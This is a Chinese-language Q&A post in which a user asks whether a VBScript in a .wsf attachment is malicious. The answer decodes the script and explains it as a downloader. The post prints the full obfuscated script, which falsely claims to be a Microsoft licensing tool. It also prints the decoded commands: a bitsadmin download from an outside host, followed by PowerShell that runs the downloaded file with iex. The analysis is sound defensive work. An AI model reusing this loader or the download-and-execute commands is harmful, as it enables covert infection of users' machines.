如何解决这个 VB 脚本有潜在危险吗? 更新
今天早上我收到了一个恶意文件,其中包含一个扩展名为 .wsf 的文件,我无意中点击了该文件。
我立即意识到我犯了一个错误......但为时已晚:( 你能告诉我这是不是恶意代码吗?
代码如下:
<package><job id="zXGYF_83"><script language="VBScript">
' Version: 10.7.91
'
' copyright (c) Microsoft Corporation. All rights reserved.
'
' Windows Software Licensing Management Tool.
'
Set ISUaUv=WScript.CreateObject("WScript.Shell")
jpHg="&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{stdev$$|im€$Qp($?krmvxW1xyS$€wp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st"
arr=split(jpHg,"dev")
For Each nEZVNX In arr
KcSOUa=""
fInEJ=Len(nEZVNX) - 1
For intI = 0 to fInEJ
KcSOUa=chr(Asc(Mid(nEZVNX,intI + 1,1 ))+0-4)+KcSOUa
Next
ISUaUv.run KcSOUa,false,-1
Next
</script></job></package>
谢谢!
解决方法
它混淆自身的事实很好地表明它可能是恶意的,如果你想看看它试图运行什么;
注释掉这一行(如下所示);
'ISUaUv.run KcSOUa,false,-1
在它下面添加这一行;
WScript.Echo KcSOUa
当你运行脚本时,你会得到这个输出;
输出:
powershell -c ""&bitsadmin /transfer rDIlrsRC https://imwithmark.com/omar/DFDLSS70S07M052Z/inter.xls %appdata%\inter.xls""
powershell -c & $lM=gc %appdata%\inter.xls| Out-String; $lM |iex
从第一行来看,该脚本使用 BITSAdmin service(Windows 内置)启动从远程 URL 下载到存储在您的用户配置文件 AppData 文件夹中的本地 XLS 文件。至于第二个,我不清楚它的作用是什么,但具有更多 PowerShell 知识的人将能够阐明它。
更新
它看起来是在使用 gc
(PowerShell 中的 Get-Content
小程序)使用 Out-String
命令将文件内容拉入字符串中。然后将其通过管道传递给 iex
(Invoke-Expression
命令)以执行。
可能是下载的 inter.xls
文件包含恶意命令,然后这些命令会在本地系统的上下文中本地执行。这是一个经典的脚本小子黑客,可以绕过远程代码执行。
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。